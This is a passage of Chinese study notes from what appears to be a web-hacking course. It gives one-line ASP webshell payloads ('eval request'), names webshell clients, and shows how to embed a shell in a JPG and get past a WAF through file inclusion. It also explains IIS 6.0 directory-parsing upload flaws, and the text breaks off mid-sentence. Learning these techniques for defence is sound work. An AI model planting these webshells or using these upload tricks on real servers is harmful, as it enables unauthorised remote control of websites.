突然感觉有点迷茫…是因为没有实际操作吗??..还是基础不牢固??.继续看视频吧
一句话木马:
黑客在注册信息的电子邮箱或者个人主页中插入类似如下代码:
<%execute request(“value”)%>
其中value是指,所以可以更改自己的值,前面的request就是获取这个值
<%eval request(“value”)%> 现在比较多见
当知道了数据库的url,就可以利用本地一张网页 进行连接 得到webshell.
(不知道数据库也可以,只要知道<%eval request(“value”)%> 这个文件被插入到哪一个asp文件里面就可以了.)
这就被称为一句话木马,它是基于B/S结构的.
jsp的特殊,需要操作一下
一句话客户端: 中国菜刀,中国砍刀,lanker一句话客户端,zv新型php一句话木马客户端GUI版
一句话木马的制作
C32下做一句话
打开c32,把图片放里面,写入一句话保存…退出
cmd下做一句话
copy /b 1.jpg+1.asp 2.jpg
win7下右键图片,在属性->详细信息->版权内插入一句话即可
使用包含进行突破waf
asp包含文件,不含恶意代码… 把一句话木马写在jpg里包含在asp中这样就可以过waf
上传解析漏洞
解析漏洞主要说的是一些特殊文件被iis、Apache、Nginx在某种情况下解释成脚本文件格式的漏洞
IIS 5.x、6.0解析漏洞
IS6.0解析利用方法有两种
1.目录解析 /xx.asp/xx.jpg
在网站下建立文件夹名字为.asp、.asa的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行.
例如创建目录cracer.asp,那么/cracer.asp/1.jpg 将被当作asp文件来执行.假设黑客可以控制上传文件夹路径,就可以不管你上传后